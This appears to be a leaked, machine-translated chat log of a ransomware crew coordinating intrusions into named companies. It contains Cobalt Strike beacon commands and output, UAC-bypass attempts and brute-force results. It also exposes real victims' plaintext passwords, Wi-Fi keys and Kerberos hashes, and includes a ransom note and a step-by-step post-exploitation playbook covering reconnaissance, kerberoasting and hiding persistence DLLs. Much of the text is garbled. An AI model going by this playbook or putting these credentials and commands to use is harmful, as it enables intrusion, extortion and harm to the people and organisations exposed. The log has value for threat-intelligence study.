``most likely domain kredes.there is a sessionbii pizda)morally i'm with you guys) and optimize the actions to reduce unnecessary and uselessnu finalize / reprocess all the hodgepodge that i have on my hard drive from the "working" roughly related to the development of a full-authored tulkit that we saw now do a channel one thematic
can for half an hour will be distracted for a small discussion, and you guys are all here now? projection of the logics prescribed in the DUs and groups to the results of scans from different points-try to understand the logic of the location of "hardware" that blocks the ports
it can be in the physical location, functional purpose, destination "by department", just an iron between the server and user segments
often these networks have many DCs and subnets are isolated from each other but no domain controllers for successful replication and almost never on the "tech machine" they put phasers on the segments and look for a route correct solution administration of network firewalls that prohibit incoming connections and not the fact that it will skip all the same but this will hardly work because ntlm relay in its current state can "hit" only another machine other than the one from which initiated the connection spuf some not just to make it work but to make the authorization from this machine.
all the ports are closed? all the ports?
but we were able to break into the session
```
in the "outgoing" session? i have a question, why not do the bind? not yet work in the ones that were, but if there are new ones, wait for a) nowhere? there is no yes where yes? 2 grids close to deadlocks is there to work? longHow are you? helloToday the ceiling is still an hour, prepare a lack of data, tomorrow for lunchso I need to go away on business, I understand that there is something to do, write, if I can help what to suggest - I will definitely tell when I return://www.stellarinfo.com/blog/exchange-mailbox-backup-using-powershell-cmdlets/?то have conditional technicians a couple .pst pull and ommm
no clue... I usually just downloaded the target boxes through EAC@tl2
question on
>3) a backup of the mail server
so i had a server named `Exchange.rtpco.local`
I go to `C:\Program Files\Microsoft\Exchange Server\V15\Mailbox`
and i download that hereff twitch, chromium will not decrypt without masterkeyypodderzhayut browsers at the admins carefully without cobalt sesikarbon - fact, well, they also do not have excheindge, i need to look for mail on #evo-com there everything is ready except two nas in vokrrup, they should look in the admins browsers, we have looked there only fs and ff, since.We have not jumped anywhere on the machines, worked from the dedicat on the vpnom. Cabron sees everything, so if we jump somewhere, it will count down and on the same day it has to be closed. And the time there is - 11, so we have to start somewhere at 9 - 10 in the morning.Today in general, the idea of three-toni have not yet come it to @user3 and @user9
they seem to be working with this grid on #evo-com. how's it going? hi.
on #rtpcompany-com.
found a bunch of esxi's that they didn't find last time, and the cres for them, kinda left to finish with the additional tasks (skul, ecch, etc.)

on #waterway-com.
I have not picked up creeds from nimbles, they seem to really pass them on a piece of paper, the IT guys are keylogged, one of them tried on Friday and could not get to nimbles, then went to Lastpass and locked himself there tell me what progress was at the end of last week on the current tasks@tl1 today is missing - so I substitute all hello danikak not get through? so far, have you given up on this grid? `USIDgfs867gfusydkGTTKJUg` ready to build? kobi then shoot + i think before 3+- more to review the grid and then you can already start then close today neah, in vim is not podlkuchennym
no software solutions besides vim? what about clouds? we don't need it that much
look at all the hosts?
we found two and in vim backup also two[ ](https://mediaeveryone.com/group/overland-com?msg=5QfnebYASzT2PbuXp) sannets scanned, there is no hint of the center of ``TESTLAB-PACKV9`` but it does not get to her at allhas come across the cars
```
TEST044-R002V9
TEST044-R002
I think there is a way for linux...is there any way to tell from the guest machine which host it runs on?
https://10.69.0.51/restgui/start.html``

```
``in general''.
there seems to be no hyper-v host control center
only two hosts, there are 34 virtual machines running on them, and they're on +- half of them
hell servers 76, haven't pinged yet but it feels like there are not many alive
They back up on diskstation(10.69.0.22) mainly the file dump and sometimes servers.
I can't see any other backups yet.
http://10.69.0.90:5000/
As usual)-already figured it out, only looked at ` Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), so it doesn't existReply from 10.69.201.15: Destination host unreachable.`
beacon> shell ping 10.69.201.21
[*] Tasked beacon to run: ping 10.69.201.21
[+] host called home, sent: 49 bytes
[+] received output:

Pinging 10.69.201.21 with 32 bytes of data:
Reply from 10.69.201.15: Destination host unreachable.
Reply from 10.69.201.15: Destination host unreachable.
Reply from 10.69.201.15: Destination host unreachable.

[+] received output:
Reply from 10.69.201.15: Destination host unreachable.

Ping statistics for 10.69.201.21:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

``[ ](https://mediaeveryone.com/group/overland-com?msg=mwdZmFecWDkt7TjDc) From the same subnet[ ](https://mediaeveryone.com/group/overland-com?msg=Xfgnbd6C2RFa7d3Wo) beacon> shell ping -n 1 10.69.201.21
[*] Tasked beacon to run: ping -n 1 10.69.201.21
[+] host called home, sent: 53 bytes
[+] received output:

Pinging 10.69.201.21 with 32 bytes of data:
Reply from 10.69.201.15: Destination host unreachable.

Ping statistics for 10.69.201.21:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),and from where you ping the answer to the pingnote the point of the port scan then?)yes[ ](https://mediaeveryone.com/group/overland-com?msg=2CWKmH8yR33F2viCj) did not understand the question? Will telnet show that port 22 is open if you telnet server_name 22
beacon> portscan 10.69.201.21 445,443,5000 icmp 1024
[*] Tasked beacon to scan ports 445,443,5000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 22 icmp 1024
[*] Tasked beacon to scan ports 22 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 80 icmp 1024
[*] Tasked beacon to scan ports 80 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 1-1000 icmp 1024
[*] Tasked beacon to scan ports 1-1000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 1001-5000 icmp 1024
[*] Tasked beacon to scan ports 1001-5000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 5001-10000 icmp 1024
[*] Tasked beacon to scan ports 5001-10000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

Give the answer pinga 22 open for telnet?) I do not remember how I did, in my case there is no ping on ip. of course you can check telnet) From him like you can not hide) replica on the ping is disabled and within the settings of the system itselfwhy this?my guess is that he should not ping in this caseb no open ports from the point of scanTranny ip no open ports 10.69.201.21http://10.69.0.22:5000/ nas with backups (admin:CR@CKer$) fs see from yes this password on the admin account from two domains `CR@CKer$` they are not scans plz more dicin from these domainsAll alive ovrecomm.com
```
OVRECOMMAD01.ovrecomm.com
ovrdb2.ovrecomm.com
ovrdb1.ovrecomm.com
OVRECOMMAD02.ovrecomm.com
OVRDB1A.ovrecomm.com
OVRSCDB1.ovrecomm.com
``All live ovrweb.com

```
OVRWEBAD01.ovrweb.com
ovrweb1.ovrweb.com
rweb2.ovrweb.com
OVRWEBAD2.ovrweb.com
OVRWEBAD02.ovrweb.com
OVRWEB2A.ovrweb.com
OVRWEB1A.ovrweb.com
OVRSCWeb1.ovrweb.com
OVRSCWeb2.ovrweb.com
OVRSCWeb3.ovrweb.com
``no questions about the tasks have you got? + you will have all 3 then come another one from another domain + you have my first session left? nullpin.comdomain) kobu or domain?kobu give me also quietly, sessions from all pc do not pull, you can reshoot hell and check availability of hosts there do not remove dsink and hashes goodnightTill tomorrow, tomorrowbto tomorrow by 6+ give 2 more domains to look at finanal check everything here and close it fully then ok die```
dn:CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>objectClass: computer
>cn: SYSTEMCENTER
>distinguishedName: CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com
>instanceType: 4
>whenCreated: 20190613140038.0Z
>whenChanged: 20201117102629.0Z
>uSNCreated: 36464435
>uSNChanged: 46733431
>name: SYSTEMCENTER
>objectGUID: {11A33782-FF53-4D61-B6ED-92C585B680CC}
>userAccountControl: 4096
>badPwdCount: 0
>codePage: 0
>countryCode: 0
>badPasswordTime: 0
>lastLogoff: 0
>lastLogon: 132502892466357264
>localPolicyFlags: 0
>pwdLastSet: 132498579429186892
>primaryGroupID: 515
>objectSid: S-1-5-21-917468999-1386106184-2076119496-6860
>accountExpires: 9223372036854775807
>logonCount: 439
>sAMAccountName: SYSTEMCENTER$
>sAMAccountType: 805306369
>operatingSystem: Windows Server 2016 Standard
>operatingSystemVersion: 10.0 (14393)
>dNSHostName: SystemCenter.overland.com
>servicePrincipalName: WSMAN/SystemCenter.overland.com
>servicePrincipalName: WSMAN/SystemCenter
>servicePrincipalName: TERMSRV/SystemCenter.overland.com
>servicePrincipalName: TERMSRV/SYSTEMCENTER
>servicePrincipalName: RestrictedKrbHost/SYSTEMCENTER
>servicePrincipalName: HOST/SYSTEMCENTER
>servicePrincipalName: RestrictedKrbHost/SystemCenter.overland.com
>servicePrincipalName: HOST/SystemCenter.overland.com
>objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=overland,DC=com
>isCriticalSystemObject: FALSE
>dSCorePropagationData: 20200409185421.0Z
>dSCorePropagationData: 20190731210520.0Z
>dSCorePropagationData: 20190731210518.0Z
>dSCorePropagationData: 16010101181633.0Z
>lastLogonTimestamp: 132500823894234705
>msDS-SupportedEncryptionTypes: 28
``````
Ping request could not find host SystemCenter.overland.com. Please check the name and try again.

``in hell)``and where did you see it? What kind of host is this?
--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : overland\administrator
Credential :
LastModified : 1/21/2016 8:52:52 PM

--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://login.microsoftonline.com/
Identity : azureadadmin@overlandsheepskin.onmicrosoft.com
Credential :
LastModified : 3/16/2018 6:46:12 PM

--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : administrator
Credential :
LastModified : 4/4/2017 7:35:39 PM

--- IE/Edge Credential ---
Vault Type : Web Credentials
Resource : https://localhost/
Identity : todd@overland.com
Credential :
LastModified : 1/16/2019 3:56:37 PM

``and there we'll decide what to do then half an hour more to check the network meanwhile hypervi servers and hz where the sphere and whether it is at all Find the sphere, and recheck the sphere + there is a suspicion that we are 10.69.0.90:5000 but it is disabledseveral hours close? ``Elar1n22````
todd@mail.overland.com
OVERLAND\todd Elar1n55
``Till tomorrow, see you tomorrowTill tomorrow it means that for today you can close the session1) look through the balls for interesting files and scripts that contain other creeds
2) searching for popular passes sa account on mssql servers
3) see network devices for access to them by default passwords (routers/switches) what can you do? @tl2 @tl1elevate does not workLA, and yuak does not want to bypass the domain, but LA on his tachkene have no idea, let the brute force, still going, it was in the first lines of the SBolley is not a domain user?
```
[+] 192.168.90.6:445 - 192.168.90.6:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.11.42:445 - 192.168.11.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.110.42:445 - 192.168.110.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 10.220.136.40:445 - 10.220.136.40:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.30.42:445 - 192.168.30.42:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 192.168.11.43:445 - 192.168.11.43:445 - Success: '.\SBolley:thisduckingsucks!02'
[+] 10.200.132.52:445 - 10.200.132.52:445 - Success: '.\SBolley:thisduckingsucks!02'
``user8user4user3https://www.exploit-db.com/exploits/3220`spoolsv.exe
there is such a process try the sharpa implementation I linked above it might be alerts on unencoded paiload in b64 encodefodhelper in sharpa
https://github.com/FatRodzianko/SharpBypassUAC
``and everyone else has tried it too,``````
beacon> audit_uac
[*] Tasked Beacon to audit UAC settings
[+] host called home, sent: 149229 bytes
[+] received output:
[+] SBolley is a local Administrator!
[Info] DETSBOLLEY23063 is Windows 10.0.18363.

[+] Invoke-SluiBypass should work to bypass UAC.
[+] Invoke-FodhelperBypass should work to bypass UAC.
[+] Invoke-TokenDuplication should work to bypass UAC.
``` `
Invoke-FodhelperBypass - AV blocking
Invoke-SluiBypass - hangs a seia
Invoke-TokenDuplication - does not work all the methods have not helped?
>memberOf: CN=SQL Financial
 
User: DBunte - IP Address: 192.168.90.2
 
User: Melissa - IP Address: 192.168.0.126
User: Melissa - IP Address: 192.168.0.28
  
User: srethmeier - IP Address: 192.168.0.124
  
User: achackes - IP Address: 192.168.0.61
``so far I found only >memberOf: CN=SQL Financial and I'm looking for someone to yank the dotted-exch server did not find it for tomorrow?well, and mailb but that's all you have to do right on the netmomorrow i suggest you close all 3)we have almost everything ready as well \ evo, except for a couple of nasov, that's why they both are ready, they don't go there very often, there's no point in waiting around in this kind of spirit, to write my password doesn't fit, like "what are you stupid, it's on your sticker on the monitor" to have everything ready, it should be done on closing day, it could get any answer, everything is in the moment) very dangerous and we will fly out immediately hahaas one IT guy will write another one what pass to nimbla or try a seiplan like this, we will either close without nimbla but we need the data it is there is a backup .pst of one IT guy I still prioritize with #rtpcompany-com, as it is closer to closing in addition to nimbla the rest is ready? backups and other thingsthere is nothing what? And write yourself a mindmap to raise the rights from LP to DANa write to the PS detailed reports on the work done in the last 2-3 days. While you can take care of organizing entries for modules and other things, as well to write yourself a manual on all the vectors that were and in what order is better to act. Finish at 20:00 todayhttp://fixmypc.ru/post/kak-naiti-zaloginenykh-polzovatelei-aktivnye-s-s-powershell/if the `beacon_reverse_tcp` load works in `Windows Executable (S)` which went through `shellConcatenation.1.0.0` but it does not work through `rportfwd` most likely the problem is in `rportfwd` itself[ ](https://mediaeveryone.com/channel/general?msg=mQY8BtgM65Eh6Tpz6) and tested on a normal https sheet? or already on rportfwd? and what do not like `Attack -> Packages -> Payload Generator`? it is 255 times larger Yes, but not sure that `shellConcatenation.1.0.0` itself supports such file size RAW) and about `rportfwd` not quite understand
```
beacon> help rportfwd
Use: rportfwd [bind port] [forward host] [forward port]
     rportfwd stop [bind port]

Binds the specified port on the target host. When a connection comes in,
Cobalt Strike will make a connection to the forwarded host/port and use Beacon
to relay traffic between the two connections.
````Windows Executable (S) - RAW ` is a stageless variant, namely when you do RAW through `Attack -> Packages -> Payload Generator ` you make an intermediate file that after launching it downloads the working code of the coba itself, in `Windows Executable ` immediately goes this working code, without additional paginghit then until lunch, work with it all together + from sessions only MATCHES?good morninGood morninG I'm goinG downstairsGonna be quiet(@tl2 on kerbals quiet?(only neatly, it's paintedBeep the door powerful🗿There's a zabulydalaGood morninG good morninG good morninG good morninG is quiet(@tl2 on kerbals quiet?(fix couldn't be set up no session no?
otsql$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
ichiban$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
``bvot ker''.
$krb5tgs$23$*admbchapman$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
Sessions are dead? I'll replay them all at once, then give me 2F, is it possible to replay sessions? we still have a third one i'm just stressed that in general all the time i can't get in) and by the way you're not in the other one) plus i'm not really from here) including the pindos) here 99 people know where the fuck yaoi is from we have dolphin concerts on the boardwalk
dope dudes shows on acid
vodka under Uncle Jura in this rock isn't too effective sometimes) and the action is somewhere far away) and here it's not
tired - poured in Moscow all there on the pampa some
competitive level
full of trafficPrivyk that dopemtvuet) used to) how much more)that's the point)aren't you used to?))) contributes))) as we always have in general))) my weather also contributesI also think about it lately)but too stable I do not have any problems even everything works not, I like it here
it's ok okine since the beginning of December already good you had a rest)while i'm still functioning i need to seize the moment) i'll go for treatment)if i don't get off before the end of the month i can't get off the booze i'm all ok)and at night they'll close everything tomorrow come by 6 they'll make it today sleep and they just want to sleep) they complain to you?)they're sleepy, they're sleepy, they're sleepy, they're sleepy, they're sleepy, they're sleepy, they're sleepy, they're sleepy, they're sleepy
i think you started there no? you have to go online first so there's a nix 0d lp that came out of the net recently) if you have access to the extended server you can check it out on papersource!!!oh by the way that papersource is fucked if they took out the webshell therepres.com still left
but you need an exe to run it there's also triadmetals I think if there's a bot on the net you can get it
it's ownerless they may or may not pay
it's roulette
it doesn't depend on anything they are all in the process ... i think not on the dream they will pay? all in the works my 4 what else your bots are there on the backdoor the point? snoedu do for now
there's a fuckin' penny of work out there((dude's off-line for now
will be somewhere by 22 (i'll work with her 2f))) do it and tell me how the other 3 sessions will be reshot ok
if anything work it was at the time of the report, and then went to other tasks) wrote) IN PROGRESS neah, in work only currentsun. food work? there are no more on ipak this already notedda seeglobaltrans250 by205.236.0.43
204.134.196.195
107.0.14.250

on these three to recapture the sessions?
EXTERNAL INTERNAL VPN OWNER REVENUE STATUS LOG
lrhc.org lrhc.local 66.228.239.136 user8 140kk IN PROGRESS ntds, research
		205.236.0.43 user4 STOPPED no valid accounts
snu.edu 204.126.2.44 user7 IN PROGRESS
		204.134.196.195 user4 STOPPED 1 acc not valid, 1 acc 2fa
		107.0.14.250 2fa
globaltranz.com Globalnet.local 162.42.243.250 ERROR blocked

``````
EXTERNAL INTERNAL VPN OWNER REVENUE STATUS LOG
lrhc.org lrhc.local 66.228.239.136 user8 140kk IN PROGRESS ntds, research

why the fuck not lol, maybe we'll make a comeback to chelsea? we had it since sonic) spslububut pod 4.1 it's the same as it was what? eemo can you send me the coba tuning guide? i'll make some notes for myself. describe the current status of the times we have with vpns that are sonicwalls? what about the work? overland is gonna drop ok =)
All of your files are currently encrypted.
Backups have been encrypted or deleted, same as Shadow Copies.

If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.

To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge.

The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website:

TOR VERSION :
(you should download and install TOR browser first https://torproject.org)

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION :
https://contirecovery.best

---BEGIN ID---
W2GzoYgyg5zZYaIAHs4u2MR6UaxLrzlsyRb8qzwHbzENpcIR8KkCR8gmXgaDryRo
---END ID---
``So it's alreadyprvettarget asked in a note to remove everything except the chat and inukruktsii how to get there
when you order the buildsprivet we do not have them. and keylogger is not installedtu I dunno when connecting the client fortyk it asks for a login and password as I remembernu or quick knocked out it seems not after running the commands are the interfaces up? did you do this
```
beacon> shell wmic nic get name, index
[*] Tasked beacon to run: wmic nic get name, index
[+] host called home, sent: 55 bytes
[+] received output:
Index Name

0 Microsoft Kernel Debug Network Adapter

1 Intel(R) Ethernet Connection (6) I219-V

2 Intel(R) Wi-Fi 6 AX200 160MHz

3 Microsoft Wi-Fi Direct Virtual Adapter

4 Fortinet Virtual Ethernet Adapter (NDIS 6.30)

5 Fortinet SSL VPN Virtual Ethernet Adapter

6 PPPoP WAN Adapter

7 WAN Miniport (SSTP)

8 WAN Miniport (IKEv2)

9 WAN Miniport (L2TP)

10 WAN Miniport (PPTP)

11 WAN Miniport (PPPOE)

12 WAN Miniport (IP)

13 WAN Miniport (IPv6)

14 WAN Miniport (Network Monitor)

15 Bluetooth Device (Personal Area Network)

16 Microsoft Wi-Fi Direct Virtual Adapter #2

17 Broadcom NetXtreme Gigabit Ethernet




beacon> shell wmic path win32_networkadapter where index=4 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=4 call enable
beacon> shell wmic path win32_networkadapter where index=5 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=5 call enable
[+] host called home, sent: 174 bytes
[+] received output:
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="4")->enable()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ReturnValue = 0;
};


[+] received output:
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="5")->enable()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ReturnValue = 0;
};

``Yes, there seems to be a disconnect''.
                           [03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
                                 Connection Name: Ethernet 2
                                 Status: Media disconnected
                           [04]: Fortinet SSL VPN Virtual Ethernet Adapter
                                 Connection Name: Ethernet 3
                                 Status: Media disconnected
``````
Windows IP Configuration


Ethernet adapter Ethernet 3:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :

Ethernet adapter Ethernet:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :

Wireless LAN adapter Local Area Connection* 1:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :

Wireless LAN adapter Local Area Connection* 10:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :

Ethernet adapter Ethernet 2:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :

Wireless LAN adapter WiFi:

   Connection-specific DNS Suffix :
   IPv6 Address. . . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0
   IPv6 Address. . . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0
   Temporary IPv6 Address. . . : 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10
   Temporary IPv6 Address. . . : fdb0:64:3df8:0:c889:fce9:a8e0:ab10
   Link-local IPv6 Address . . . : fe80::7de6:b515:bbeb:89c0%11
   IPv4 Address. . . . : 192.168.0.80
   Subnet Mask . . . . : 255.255.255.0
   Default Gateway . . . . . fe80::7e4c:a5ff:fef9:c2a0%11
                                       192.168.0.1

``````
Host Name: UKHOEVLT3156
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18362 N/A Build 18362
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization: MatchesFashion
Product ID: 00330-52356-69234-AAOEM
Original Install Date: 11/29/2019, 12:10:04 PM
System Boot Time: 9/18/2020, 9:20:23 AM
System Manufacturer: HP
System Model: HP EliteBook 830 G6
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 142 Stepping 12 GenuineIntel ~1600 Mhz
BIOS Version: HP R70 Ver. 01.02.01, 8/26/2019
Windows Directory: C:\windows
System Directory: C:{windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-us;English (United States)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 7.998 MB
Available Physical Memory: 850 MB
Virtual Memory: Max Size: 29,502 MB
Virtual Memory: Available: 15,235 MB
Virtual Memory: In Use: 14,267 MB
Page File Location(s): C:\pagefile.sys
Domain: matches.com
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
                           [01]: KB4514359
                           [02]: KB4513661
                           [03]: KB4515383
                           [04]: KB4516115
                           [05]: KB4515384
Network Card(s): 4 NIC(s) Installed.
                           [01]: Intel(R) Ethernet Connection (6) I219-V
                                 Connection Name: Ethernet
                                 Status: Media disconnected.
                           [02]: Intel(R) Wi-Fi 6 AX200 160MHz
                                 Connection Name: WiFi
                                 DHCP Enabled: Yes
                                 DHCP Server: 192.168.0.1
                                 IP address(es)
                                 [01]: 192.168.0.80
                                 [02]: fe80::7de6:b515:bbeb:89c0
                                 [03]: fdb0:64:3df8:0:c889:fce9:a8e0:ab10
                                 [04]: 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10
                                 [05]: fdb0:64:3df8:0:7de6:b515:bbeb:89c0
                                 [06]: 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0
                           [03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
                                 Connection Name: Ethernet 2
                                 Status: Media disconnected
                           [04]: Fortinet SSL VPN Virtual Ethernet Adapter
                                 Connection Name: Ethernet 3
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes


```systeminfo and ipconfig about interfacesWhat other ideas? All services with fortinet in their names are running. Fortinet's virtual interfaces are on. To no avail. The domain does not appear.
_-_-_-_-_-_-_-_-_-_-_-_-_--> [+] WIFI <-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
    SSID name : "rothbarguest"
    Cipher : None

    SSID name : "BA53LG"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : pinkblind

    SSID name : "SKYCWVNA"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : 81kwISrQXbTM

    SSID name : "home"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : jake2210boy

    SSID name : "BT-NGAFJ8"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : CM3NxJT63QDiLt

    SSID name : "BTHub5-K3M6"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : 76cc939872


    SSID name : "TALKTALK-ADE727"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : AGWGA9W6

    SSID name : "BT-68A2KJ"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : VpHFa7NVYnKYub

    SSID name : "Elfordleigh"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : Security12

    SSID name : "SKY94FE2"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : RBPXFQEA

    SSID name : "MF_Guest"
    Cipher : CCMP
    Cipher : GCMP
    Key Content : MatchNow
``````
Louisad
M@tches2020!!!
You can also put me in the new rocket.
skytechinc.com
``@user9 - prepares the network and still hasn't given me an external domain for the conf
@user7 - #corp-televisa-com-mx
@user8 - gave me a VPN
@user3 - gave me a ripcord
@user4 - gave out a vpn, kznm[ ](https://mediaeveryone.com/channel/general?msg=fue3bjcmbBoFoLAFL) ԛ so he's deadbeat, he@user9 is busy with the network, he's preparing to close outm me - definitely not caught? I don't think so They had no password manager setup on solara[ ](https://mediaeveryone.com/channel/general?msg=h4E8itvspTabEgzud) that's what? #ballymoregroup-com
there were two nasal passwords, one didn't work
2 backups of the server with the listings removed.
looked for a sphere
then it crashed
first came back, knocked out the first us, changed passwords, then it crashed
then came back machine that does not have access to the domain, from vpn no configs, no kred, stood keylog, did not catch anything checked mp?sccy collected browsers from ALL computers, no thresholds already not the first day with them on sccy and ballymore write that done (remember, vpn can not turn on without a confirmation code, they have 2fa) was in work ѕssession aliveDetached from the companyDetailed to take a new onevsm gone?if there's something to take, i'll take it, i've got a guy who left #corp-televisa-com-mxsccyballymore fell off
i'm sure no one from the office came in either, but you'd better change it while i'm with user7
i'm late, who came at all? did everyone sleep at home? did i ask my friends about their domain?
```
01/28 12:07:45 *** sup has joined.
01/28 12:10:25 *** sup has left.
``not``.
sup beacon> exit
[*] Tasked beacon to exit

``@tl1 are you out of all sessions in the cob 172....218? Hi all, tomorrow to 5login_passwdlogin_username in snu.edu trying to get out of the vpn
i'm trying to get out of coppers with SMBGhost and a bunch of different rdpplots i tried - all bypassed how to order salt on hydra there) i don't know about hydra) i'm trying to figure out hydra in #corp-televisa-com-mx trying to break into any car@user9 for a long time went to the long distance to sort out with the hydra with the hydra to sort out with the hydra how to brute web formulas another way to brute the webs hydra sort out without + what are you doing) - brute will all in the sccy?++sssss who's busy with what?
At the input we have an ordinary bot with user rights and consider the first stage of work from this context.
1. Gathering information about the domain controllers on the network and checking if the domain is visible
	- net domain_controllers
	- net dclist
	- shell nltest /dclist:
The first of the three commands is usually sufficient, but if it gives no result, you can try the others.

2. Gathering information about Active Directory composition using AdFind.exe
	- Load adfind.exe and adf.bat into a writable folder
	- move cobalt bin to the folder
	- run shell adf.bat
	- wait for script to finish
	- download the result and delete what we downloaded to the machine
``wrote on the basis of your guide) yes, I understand you could take the adfain + shuffle on the first items and other fuckiniya it was written with the expectation of a skip av lab to quickly reload if you find the admin balloon available to do periodically spell type C:{path\output.ttto look through the biconnel if shairfinder goes long is in the words, I'll add it to the commands ```
ENTRY POINT guide

1. Gathering primary information about the domain and the environment
	- Domain name
	- DCs list
	- LA\DA\EA
	- Password policy
	- PS
	- EDR
	- Systeminfo
On the basis of this information we see what kind of network we are looking at: a workgroup with VPN, a lab, a work network. If you can't make a conclusion from step 1, go to step 2.

2. Collecting BP information
	- ADFind
	- ADFind trust
If the total size of the files is more than 40mb, you need to put them into the archive. After analyzing the AD we make a conclusion about the network type. If it is a workgroup without a visible domain, we skip it and take the next network to work on. If a full-fledged network, move on

3. Gathering additional information about the domain and environment
	- Browser Dump
	- Seatbelt
	- kerberoast, asreproast
	- DuzzleUP
	- WinPEAS
	- Watson
	- GPP
	- ShareFinder
all files in the process and logs you put in a folder with the name of the external network domain, under the names corresponding to the utilities you run. You pass the brute-force hashes to team lead 2

4. Additional actions. During ShareFinder run, we run persist on the entry point (ONLY IF YOU SUGGESTED IT)
	- generate a NEW build for EVERY run
	- hide dll in user folders (preferably appdata and as far away as possible)
	- run it, check if the dll is not deleted + staska appeared, write to me: hostname, startup rights

all files are duplicated in the conf, as well as stored in a separate folder in your local
þþþ there is of course the fucked up 10 minutes? understand what a fuck up? and found them in the center of the fuck))) they just have not touched on the lockei so I understand through these esix how they recovered did not read?a geez they're looking for ssx access in the cix + rubikdaa have plans for the theme of the hospital again?)) okaya you hash dumped here and wrote there for you to look here) well, I did not write more) and so I wrote so hash in brut what exactly check? ok secv brut please```


TicketByteHexStream :
Hash : $krb5tgs$23$*Administrator$activedirectory.fishusa.com$MSSQLSvc/Fishusa-DC.a
                       ctivedirectory.fishusa.com:55423*$AD57FE3D3891F5A3A264DFF456950F6C$8EA98D3AB
                       C059F0EFAE4925C27EDACDD3FC613D5330AE0ED5D868BC3F009402DE5A8D2673F71142F22E7E
                       17FBF20B865DDE95661ED0A2E02564DA4263BE403CEEFA40D587CEDC9D26F40FEF13B7FC7A9C
                       624A505279BEF60B84B1D4BDBF94AF3179E5A3AC11D1ABD739B2CA1044D0F593E4B5D915551E
                       C58D27D405C6BA305AD1E92F40F67A5217F7B7DE1667E13AC325E265682438B8CD0282C04B35
                       4593455C183E69922BA97727DDAA3B910FBC253726FE5EC70D533AB1EE9A282C332A37214F5F
                       2DB2410468E4509EEA5CC450F2EE342382B3D5AE422B5B4C5DB0ED0414D50E19B78E1F4DE0E2
                       5311CAD6AC3021B49124759367B078759DDD3AADF716B104266BB5AFEBB6507515675562ABE3
                       4278CABDA26ADF17CD9AF7B7FEFE4F717235B1388112F9C43513A72127FD21449C9BDDDE8887
